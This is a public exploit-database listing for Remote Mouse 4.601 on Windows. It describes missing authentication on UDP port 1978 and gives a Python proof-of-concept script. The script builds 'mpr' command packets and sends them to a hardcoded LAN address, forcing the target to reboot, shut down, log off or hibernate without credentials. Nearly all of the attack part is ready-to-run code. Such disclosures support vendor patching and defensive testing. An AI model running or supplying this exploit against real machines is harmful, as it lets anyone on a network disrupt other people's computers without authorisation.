Remote Mouse 4.601 Unauthenticated Remote System Control

2025.07.15
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: Remote Mouse 4.601 - Remote Power Control (Shutdown/Reboot/Logoff) # Date: 14/07/2025 # Exploit Author: Chokri Hammedi # Vendor Homepage: https://www.remotemouse.net # Software Link: https://www.remotemouse.net/downloads # Version: 4.601 (Windows) # Tested on: Windows 10 / Windows 11 # CVE: Pending ''' Description: Remote Mouse 4.601 for Windows is vulnerable to unauthenticated remote power control due to improper access controls on UDP port 1978. An attacker on the same network can send specially crafted packets to force shutdown, restart, or log off the target system without authentication. ''' import socket import time def send_udp(payload, ip, port=1978): sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) sock.sendto(payload.encode(), (ip, port)) sock.close() def build_payload(prefix, command): return f"{prefix}{len(command):03d}{command}" def exploit(ip): send_udp(build_payload("mpr", "1"), ip) # Reboot (1 = -r -t 0) # send_udp(build_payload("mpr", "2"), ip) # Shutdown (2 = -s -t 0) # send_udp(build_payload("mpr", "3"), ip) # Log off (3 = -l) # send_udp(build_payload("mpr", "4"), ip) # Hibernate (4 = -h) time.sleep(2) if __name__ == "__main__": TARGET_IP = "192.168.1.152" exploit(TARGET_IP)


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2025, cxsecurity.com

 

Back to Top